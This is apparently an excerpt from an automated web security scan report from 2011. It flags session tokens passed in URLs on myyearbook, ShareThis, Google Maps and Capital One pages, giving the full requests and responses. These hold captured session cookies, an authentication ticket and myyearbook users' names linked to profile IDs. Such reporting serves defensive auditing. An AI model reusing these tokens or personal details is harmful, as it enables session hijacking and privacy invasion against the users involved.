http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=
http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=
http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE4ODI4Njgz
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEyOTA2ODAw
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEzNzcwNjc5
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI0OTU3Mjgx
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NDU3MDgz
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NjQ2MjU4
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzEyMDg3
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIwNDY4NTU=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIxMjM2NDcy
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzMjQ2NzQx
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzNTI5MDI2
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzOTA4NjIz
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MDA3Mzgw
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MzQzMzQ5
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0ODkwOTY1
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MDcxMTUx
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMwMjc3ODk4
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMyNDcyMTEy
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNDIxOTUz
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNTUyMDQx
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzOTEyNzk2
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTY4MTQ3MTI=
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x
http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=
http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==

Request

GET /landing/pool HTTP/1.1
Host: games.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg; __utmv=138725551.|1=gender=unknown=1; scorecardresearch=1964828935-258875400-1311271308286

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:41:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:41:29 GMT; path=/; domain=.myyearbook.com
Set-Cookie: navbar-click=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 60975
Connection: close
Content-Type: text/html; charset=UTF-8;
X-MyPoolMember: 10.10.10.239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/
...[SNIP]...
<li class="profileMenu" data-id="profile">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=">
Profile
</a>
...[SNIP]...
<li id="reportIcon" class="headerSprite" data-id="reportabuse">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==">
Report
</a>
...[SNIP]...
<li data-id="signup">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">Sign Up</a>
...[SNIP]...
<li data-id="login"><a href="http://www.myyearbook.com//?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">Login</a>
...[SNIP]...
<li data-id="browsepeople">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=">
Browse People
</a>
...[SNIP]...
<li data-id="namesearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=">
Name Search
</a>
...[SNIP]...
<li data-id="emailsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM">
Email Search
</a>
...[SNIP]...
<li data-id="schoolsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L">
School Search
</a>
...[SNIP]...
<li data-id="advancedsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=">
Advanced Search
</a>
...[SNIP]...
<li data-id="myphotos">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=">
My Photos
</a>
...[SNIP]...
<li data-id="myautographs">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=">
My Autographs
</a>
...[SNIP]...
<li data-id="mystickers">
<a href="http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=">
My Stickers
</a>
...[SNIP]...
<li data-id="myflirts">
<a href="http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=">
My Flirts
</a>
...[SNIP]...
<li data-id="whateveriwant">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=">
Whatever I Want
</a>
...[SNIP]...
<li data-id="myvideos">
<a href="http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==">
My Videos
</a>
...[SNIP]...
<li data-id="myblog">
<a href="http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==">
My Blog
</a>
...[SNIP]...
<li class="navbar_battles" data-id="battles"><a href="http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==">Battles</a></li><li class="navbar_mymag" data-id="mymag"><a href="http://www.myyearbook.com/?mysession=bWFnX2luZGV4">myMag</a>
...[SNIP]...
<td valign="middle">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy">
<img class="photo" style="padding-right:8px;" src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/18/06/thm_phpFMLQAm.jpg"/>
...[SNIP]...
<td class="details123">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy">mark streeter</a>
...[SNIP]...
<td>
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0">
<img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/17/23/thm_phpW7Vrvq.jpg"/>
...[SNIP]...
<div class="container">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0">Ms. Janine</a>
...[SNIP]...
<td>
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy">
<img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/18/02/thm_phplc5T9V.jpg"/>
...[SNIP]...
<div class="container">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy">Alyssa Ash</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTY4MTQ3MTI=">*~Teena Ann~*</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzEyMDg3">perley murray</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI0OTU3Mjgx">Mike A</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MDcxMTUx">kylee masterson</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE4ODI4Njgz">MC B Baby :P</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEyOTA2ODAw">andy zenitram</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEzNzcwNjc5">JeanPaul Sollars</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMwMjc3ODk4">Ian m</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NDU3MDgz">Doc Harshman</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzMjQ2NzQx">Jas..n ...ruck ...anati...&#123;Doesnt Vote&#125;o=0~</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzOTA4NjIz">000~Yasmin~ Yasmin~</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIwNDY4NTU=">O.C.-Ztyle 713</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NjQ2MjU4">Tim Boylen</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0ODkwOTY1">Roy Perry</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MzQzMzQ5">James Crachiolo</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNTUyMDQx">SKULLY LIVES</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNDIxOTUz">Govind Saini</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzNTI5MDI2">glenn tan</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzOTEyNzk2">Geo M</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIxMjM2NDcy">Gary leftrook</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MDA3Mzgw">donna santos</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMyNDcyMTEy">Julie Gonzalez</a>
...[SNIP]...
<td colspan="2" class="logged_out">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...
<td colspan="2" class="logged_out">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...

8.5. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&publisher=218be740-0231-4c2d-8b14-b2efe5b83b72&hostname=www.uscgnews.com&location=%2Fgo%2Fdoc%2F786%2F1135035%2F&url=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&sessionID=1311370085431.55259&fpc=e9b43fc-13153bf8437-16a3dde3-1&ts1311370085768.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue

Request

GET /pview?event=pview&publisher=218be740-0231-4c2d-8b14-b2efe5b83b72&hostname=www.uscgnews.com&location=%2Fgo%2Fdoc%2F786%2F1135035%2F&url=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&sessionID=1311370085431.55259&fpc=e9b43fc-13153bf8437-16a3dde3-1&ts1311370085768.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Fri, 22 Jul 2011 21:27:59 GMT
Connection: keep-alive

8.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fconsultants-locator.apple.com%2Findex.php%3Ffuseaction%3Dhome.directory%26offset%3D0%26rppg%3D8%26q%3D10010&callback=_xdc_._74pqj6&token=51515

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fconsultants-locator.apple.com%2Findex.php%3Ffuseaction%3Dhome.directory%26offset%3D0%26rppg%3D8%26q%3D10010&callback=_xdc_._74pqj6&token=51515 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 21 Jul 2011 20:43:11 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._74pqj6 && _xdc_._74pqj6( [1] )

8.7. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage?1m2&1i2470098&2i3152897&2e1&3u15&4m2&1u378&2u377&5m3&1e0&2b1&5sen-US&token=72762

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i2470098&2i3152897&2e1&3u15&4m2&1u378&2u377&5m3&1e0&2b1&5sen-US&token=72762 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 21 Jul 2011 20:41:30 GMT
Expires: Fri, 22 Jul 2011 20:41:30 GMT
Server: staticmap
Content-Length: 43726
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 99

.PNG
.
...IHDR...z...y.............PLTE=5-!I.%Ik5UsE) Q).Q5.Y5!^A.MA9fA1oM=kQ!s^)k1YQIMfMYwEEbfYIf^U{^MobU{o^skfws1{.Qo.b.o....b...w9.wk.s..A....I..Q..Y..w..b..{..k..s..{.....................
...[SNIP]...

8.8. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d40.72271263275013&2d-74.0111341476441&2m2&1d40.75948767785019&2d-73.96246814727789&2u15&4sen-US&5e0&callback=_xdc_._7igzlh&token=44886

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d40.72271263275013&2d-74.0111341476441&2m2&1d40.75948767785019&2d-73.96246814727789&2u15&4sen-US&5e0&callback=_xdc_._7igzlh&token=44886 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 21 Jul 2011 20:43:05 GMT
Server: mafe
Cache-Control: private
Content-Length: 2985
X-XSS-Protection: 1; mode=block

_xdc_._7igzlh && _xdc_._7igzlh( ["Map data ..2011 Google, Sanborn",[["street_view",[[40.74725696280421,-74.025878906250],[40.76390128094587,-73.95996093750]]],["street_view",[[40.73060847779664,-74.02
...[SNIP]...

8.9. http://mt0.googleapis.com/mapslt/ft previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mt0.googleapis.com
Path:	/mapslt/ft

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mt0.googleapis.com/mapslt/ft?hl=en-US&lyrs=m%40158%7Cs.t%3A33%7Cs.e%3Al%7Cp.v%3Aoff%7Cos%3A2144862037&las=twutvtvvtvwutuu,twutvtvvtvwutuw,twutvtvvtvwutwu,twutvtvvtvwuutt,twutvtvvtvwuutu,twutvtvvtvwuutv,twutvtvvtvwuutw,twutvtvvtvwuuvt,twutvtvvtvwuuvu&z=15&src=apiv3&xc=1&apistyle=s.t%3A33%7Cs.e%3Al%7Cp.v%3Aoff&callback=_xdc_._wnit4e&token=125828

Request

GET /mapslt/ft?hl=en-US&lyrs=m%40158%7Cs.t%3A33%7Cs.e%3Al%7Cp.v%3Aoff%7Cos%3A2144862037&las=twutvtvvtvwutuu,twutvtvvtvwutuw,twutvtvvtvwutwu,twutvtvvtvwuutt,twutvtvvtvwuutu,twutvtvvtvwuutv,twutvtvvtvwuutw,twutvtvvtvwuuvt,twutvtvvtvwuuvu&z=15&src=apiv3&xc=1&apistyle=s.t%3A33%7Cs.e%3Al%7Cp.v%3Aoff&callback=_xdc_._wnit4e&token=125828 HTTP/1.1
Host: mt0.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 01:37:48 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: maptiles-versatile
Content-Length: 501
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=22222222
Age: 68728

_xdc_._wnit4e && _xdc_._wnit4e([{id:"twutvtvvtvwutuu",zrange:[15,15],layer:"m@158"},{id:"twutvtvvtvwutuw",zrange:[15,15],layer:"m@158"},{id:"twutvtvvtvwutwu",zrange:[15,15],layer:"m@158"},{id:"twutvtv
...[SNIP]...

8.10. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/OAO/initiation.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1

Request

GET /CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1 HTTP/1.1
Host: onlinebanking.capitalone.com
Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/?linkid=WWW_Z_NDB_A65A9B0C0D704AE0F0G708F_SP1_C4_02_T_SP29OA
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:33:27 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
X-AspNet-Version: 1.1.4322
Set-Cookie: InSession=1; path=/; secure
Set-Cookie: TestCookie=OK; expires=Sat, 30-Jul-2011 01:33:27 GMT; path=/; secure
Set-Cookie: AuthenticationTicket=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; secure
Set-Cookie: ASP.NET_SessionId=; path=/; secure
Set-Cookie: AuthenticationTicket=7E9AD15C6E2116D88D183D67C57A26C20820E54D245A0F8AE9840139E5BEF5ACCFCE3D1B7C44B021FEC9F130A4FEE27534778E3F63A7BBB4A0E9B46D87155881050AD326A5E1FEA27E77F2A92F11027DAFACABBA5E303B12279F104B5C246347A77571A7E5BF553780E182CEA81B9EC49B6B23AD7C1ABCC95C0A4DDA53B5CE8688AB3805777F777C4AD1123C339B404D0BCEB68C558A073F427B9AA2788AC4554799BD61BC6FF4A57B9D65FDFCF84BCC79ED17C0750A8769FF23C151F14BF9A99B0A1BBF7B7FCD6355DF8BFDE5D745DBFD0649E7F304781D462B7921; path=/
Vary: Accept-Encoding
Content-Length: 35933

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
